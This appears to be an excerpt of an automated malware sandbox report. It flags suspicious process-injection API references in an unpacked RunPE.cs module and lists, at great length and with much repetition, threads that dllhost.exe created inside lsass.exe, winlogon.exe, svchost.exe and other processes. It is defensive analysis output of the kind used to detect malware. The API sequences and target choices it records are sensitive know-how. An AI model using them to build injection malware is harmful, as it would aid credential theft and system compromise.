Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 33.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

37_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 83F0000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F1D02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AB992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 78762EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E0F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8852EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B06E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF1C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DA142EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E0F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8852EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B06E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF1C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DA142EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 765F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 36BD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 616A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 19792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1C25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BBF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3FF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DFFA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 765F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 36BD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 616A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 19792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BBF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3FF72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DFFA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A6F32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A7152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E3462EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2232EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7DB2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 21FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6B9C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6B9F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 93342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F9802EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E4762EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FBA02EBC

